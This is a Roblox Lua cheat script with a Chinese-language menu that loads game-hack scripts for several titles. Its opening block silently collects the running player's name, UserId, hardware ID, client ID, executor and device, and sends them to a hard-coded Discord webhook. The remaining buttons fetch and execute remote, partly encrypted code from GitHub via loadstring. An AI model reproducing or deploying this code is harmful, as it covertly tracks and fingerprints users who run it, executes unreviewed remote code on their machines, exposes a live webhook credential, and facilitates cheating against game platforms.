local Webhook = "https://discord.com/api/webhooks/1335644257381519442/8UXGUWpmLqFLIUs_PLF6mAMLLy1TMN3x-AqQaSeJPWNqr46ziCT6srjhY9v-Hoa2LPjB"

    local player = game:GetService"Players".LocalPlayer
    local joinTime = os.time() - (player.AccountAge*86400)
    local joinDate = os.date("!*t", joinTime)
    local alt = true
    _G.IsPc = false

    if game.UserInputService.KeyboardEnabled and game.UserInputService.MouseEnabled then
        _G.IsPc = "模拟器/PC"
    elseif game.UserInputService.TouchEnabled then
        _G.IsPc = "IOS/Android"
    else
        _G.IsPc = "IOS/Android/Unknown"
    end

    local executor = identifyexecutor() or "Unknown"
    local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar?userIds=%d&size=180x180&format=Png&isCircular=true", game.Players.LocalPlayer.UserId))
    Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1]
    local AvatarImage = Thing.imageUrl
    local msg = {
       ["username"] = "bot",
       ["embeds"] = {
           {
               ["color"] = tonumber(tostring("0x32CD32")),
               ["title"] = "有人使用了6脚本",
               ["thumbnail"] = {
                ["url"] = AvatarImage,
               },
               ["fields"] = {
                    {
                       ["name"] = "名称(Name)",
                       ["value"] = "||"..player.Name.."||",
                       ["inline"] = true
                    },
                    {
                       ["name"] = "昵称(DisplayName)",
                       ["value"] = player.DisplayName,
                       ["inline"] = true
                    },
                    {
                       ["name"] = "UserId",
                       ["value"] = "||["..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile")..")||",
                       ["inline"] = true
                    },
                    {
                       ["name"] = "地图ID",
                       ["value"] = "["..game.PlaceId.."](" .. tostring("https://www.roblox.com/games/" .. game.PlaceId) ..")",
                       ["inline"] = true
                    },
                    {
                       ["name"] = "地图名称",
                       ["value"] = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name,
                       ["inline"] = true
                    },
                    {
                       ["name"] = "使用的注入器",
                       ["value"] = executor,
                       ["inline"] = true
                    },
                    {
                       ["name"] = "账号年龄",
                       ["value"] = player.AccountAge.."天",
                       ["inline"] = true
                    },
                    {
                       ["name"] = "加入日期",
                       ["value"] = joinDate.day.."/"..joinDate.month.."/"..joinDate.year,
                       ["inline"] = true
                    },
                    {
                        ["name"] = "HWID",
                        ["value"] = gethwid(),
                        ["inline"] = true
                    },
                    {
                        ["name"] = "客户端ID",
                        ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
                        ["inline"] = false
                    },
                    {
                        ["name"] = "设备",
                        ["value"] = _G.IsPc,
                        ["inline"] = false
                    },
               }
           }
       }
    }
    
    request = http_request or request or HttpPost or syn.request
    request({
        Url = Webhook, 
        Method = "POST", 
        Headers = {["Content-Type"] = "application/json"}, 
        Body = game.HttpService:JSONEncode(msg)
    })
local NEVERWIN = loadstring(game:HttpGet("https://raw.githubusercontent.com/10h-pack/UI/refs/heads/main/NeverWin"))()

local Window = NEVERWIN:AddWindow("6脚本主菜单","MADE BY LiuXu")

Window:AddTabLabel('Tab Section')

local Tab = Window:AddTab('脚本')

local SectionLeft = Tab:AddSection('缝合区',"left")

local SectionRight = Tab:AddSection('自制区',"right")

SectionRight:AddLabel('支持游戏:造船寻宝,极速传奇,力量传奇,妄想办公室,入侵者')
SectionRight:AddButton("执行",function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/10h-pack/new-UI.345/refs/heads/main/6%E8%84%9A%E6%9C%AC%E8%87%AA%E5%81%9A%E5%8C%BA%E5%8A%A0%E5%AF%86.lua"))()
end)
SectionLeft:AddLabel('缝合区 MADE BY XIAOBAI')

SectionLeft:AddButton("执行",function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/qwaszxcv85/6jiaoben/refs/heads/main/%E5%8D%A1%E5%AF%86%E6%A3%80%E6%B5%8B.lua"))()
end)

 local Tab2 = Window:AddTab('脚本2')
 local Section2Right = Tab2:AddSection('群',"left")
local Section2Left = Tab2:AddSection('反馈区',"left")
Section2Left:AddLabel('反馈区 MADE BY XIAOBAI')
Section2Left:AddButton("执行",function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/qwaszxcv85/6jiaoben/refs/heads/main/%E5%8F%8D%E9%A6%88"))()
end)
Section2Right:AddLabel('群号')
Section2Right:AddButton("执行",function()
	setclipboard("1023667706")
end)
